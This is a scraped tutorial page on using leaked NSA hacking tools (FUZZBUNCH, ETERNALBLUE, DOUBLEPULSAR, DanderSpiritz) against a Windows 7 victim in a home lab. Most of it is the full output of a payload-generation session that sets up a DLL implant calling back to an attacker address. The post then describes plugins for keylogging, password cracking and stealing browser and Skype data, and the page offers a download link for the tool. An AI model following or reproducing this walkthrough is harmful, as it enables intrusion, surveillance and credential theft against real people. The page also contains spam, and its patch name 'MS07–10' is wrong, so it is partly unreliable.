PRINT
PRINT
SEND MAIL
SEND MAIL
TUTORIALS

How to use Dander Spiritz Tool ( available with kerberos)

Want create site? Find Free WordPress Themes and plugins.
tutorial  by MisterCh0c

I setup a lab with 2 Windows 7 machines (32 Bit but should wokr on 64 too), one for the attacker and one for the victim. I am using the FUZZBUNCH tool from the leak which is some kind of exploit framework kinda like metasploit. Basically you use it to run exploits. Let’s use the ETERNALBLUE (MS07–10) exploits to take over the victim machine

 

After that we have several option. We can run shellcode on the machine or any .dll or .exe. In this case I wanted to try out the Dander Spiritz tool. It came with “pc_prep” another utility to generate payloads for Dander Spiritz A.K.A. PEDDLECHEAP.

 
complete output:
01:06:52>> pc_prep -sharedlib
[01:06:52] ID: 2744 'python' started [target: z0.0.0.20]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)
-      7) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      8) - HTTP Proxy AppCompat-enabled (i386-winnt Level4 sharedlib)
-      9) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     10) - HTTP Proxy UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     11) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     12) - HTTP Proxy WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     13) - Standard TCP (x64-winnt Level4 sharedlib)
-     14) - HTTP Proxy (x64-winnt Level4 sharedlib)
-     15) - Standard TCP AppCompat-enabled (x64-winnt Level4 sharedlib)
-     16) - HTTP Proxy AppCompat-enabled (x64-winnt Level4 sharedlib)
-     17) - Standard TCP WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
-     18) - HTTP Proxy WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
Pick the payload type
1
Update advanced settings
NO
Perform IMMEDIATE CALLBACK?
YES
Enter the PC ID [0]
0
Do you want to LISTEN?
YES
Change LISTEN PORTS?
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.0.118
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
- 
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <CallbackAddress>192.168.0.118</CallbackAddress>
- </PCConfig>
- 
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   D:\Logs\test\z0.0.0.20/Payloads/PeddleCheap_2017_04_16_01h06m59s.760/PC_Level3_dll.configured

Now that we have our dll payload we can start the listener in Dander Spiritz:

 

Upload our payload to the target using DOUBLEPULSAR:

And now we have a connection:

Just after the connection an automatic “survey” is launched. It basically collects information about the system, tries to crack passwords, look for “PSP” (Personal Security Products) etc and saves everything into log files.

 
PSP found

After the connection is made you have different options with Dander Spiritz GUI such as taking screenshots, browsing files, managing processes etc.

But the most interesting parts are the plugins in the “Terminal” window.

Here are some of them:

YAK: install keylogger
  • ripper: steal information from Skype, Firefox & Chrome
  • runassystem: does what it says

Here’s a full list of all the commands

https://docs.google.com/document/d/1BL-bxQfKZPXM8qi_UPLyZlONLaYXdAm0dVWpGh00sO8/edit?usp=sharing

Voilà, that was just a quick overview. There are a lot more exploits and files to look into and I’m sure what researchers will find in the future will be interesting (:

 
YAK Keylogger in action
Taking a screenshot of the victim’s desktop

Download Kerberberos

here
Did you find apk for android? You can find new Free Android Games and apps.
Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *